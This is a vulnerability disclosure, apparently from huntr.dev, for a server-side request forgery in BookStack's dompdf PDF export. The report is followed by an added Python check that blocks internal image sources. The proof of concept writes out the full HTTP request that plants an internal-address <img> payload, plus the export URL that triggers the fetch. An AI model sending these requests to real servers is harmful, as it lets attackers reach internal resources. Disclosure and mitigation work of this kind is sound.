huntr | D3adog | A8D7FB24-9A69-42F3-990A-2DB93B53F76B
Aug 13, 2021 - 1:06 p.m.

Server-Side Request Forgery (SSRF) in bookstackapp/bookstack

2021-08-13 13:06:38
d3adog
www.huntr.dev
9
Tags: server-side request forgery, bookstackapp, editor rights, malicious payload, dompdf, internal perimeter

EPSS: 0.001 (percentile: 21.4%)

✍️ Description

A user with “Editor” rights can create a special book page containing an <img> tag whose “src” property points to any external or internal resource. Exporting this page using the default domPdf renderer causes the server itself to send a request to that resource.

🕵️‍♂️ Proof of Concept

Updating the page with a malicious payload in the html parameter:

POST /books/<BOOK>/page/<PAGE> HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:91.0) Gecko/20100101 Firefox/91.0
Content-Type: application/x-www-form-urlencoded
Cookie: <COOKIE>

_token=<CSRF-TOKEN>&_method=PUT&summary=&name=123&html=<img src="http://127.0.0.1:7654/test.jpg">&tags%5B0%5D%5Bname%5D=&tags%5B0%5D%5Bvalue%5D=&tags%5Brandrowid%5D%5Bname%5D=&tags%5Brandrowid%5D%5Bvalue%5D=&attachment_link_uploaded_to=1&attachment_link_name=&attachment_link_url=&template=false

Exporting the page to PDF:

http://<HOST>/books/<BOOK>/page/<PAGE>/export/pdf

💥 Impact

An attacker can use this vulnerability to exploit other resources in the internal perimeter.
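The following is an added example, not part of the original report and not BookStack's own fix: a pre-export check that lists the <img> sources in page HTML that a server-side PDF renderer should refuse to fetch because they point at loopback, private or otherwise non-public addresses. All function names, the sample page and the offline resolver are constructed for illustration, and relative paths are assumed to be the application's own uploads.

```python
import ipaddress
import socket
from html.parser import HTMLParser
from urllib.parse import urlsplit

class ImgSrcCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in the page HTML."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.sources += [v for k, v in attrs if k == "src" and v]

def system_resolve(host):
    """Resolve a hostname with the system resolver; empty list on failure."""
    try:
        return [info[4][0] for info in socket.getaddrinfo(host, None)]
    except socket.gaierror:
        return []

def is_internal(host, resolve):
    """True if host is, or resolves to, any non-public address (fails closed)."""
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        addrs = [ipaddress.ip_address(a) for a in resolve(host)]
    return not addrs or any(not a.is_global for a in addrs)

def blocked_image_sources(page_html, resolve=system_resolve):
    """Return the img src values the export step should refuse to fetch."""
    collector = ImgSrcCollector()
    collector.feed(page_html)
    blocked = []
    for src in collector.sources:
        url = urlsplit(src)
        if not url.scheme and not url.netloc:
            continue  # relative path: the application's own upload (assumption)
        if (url.scheme not in ("http", "https", "")
                or not url.hostname or is_internal(url.hostname, resolve)):
            blocked.append(src)
    return blocked

# Constructed sample: the report's payload plus other test sources.
SAMPLE_PAGE = ('<img src="http://127.0.0.1:7654/test.jpg">'
               '<img src="/uploads/images/logo.png"><img src="//10.0.0.8/x.png">'
               '<img src="https://cdn.example.org/a.png">'
               '<img src="http://intranet.example.org/x.png">')
# Constructed resolver data so the example runs offline.
FAKE_DNS = {"cdn.example.org": ["93.184.216.34"], "intranet.example.org": ["10.0.0.5"]}
```

The check only holds if the renderer then connects to the address that was validated; a hostname that resolves differently between check and fetch defeats it.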
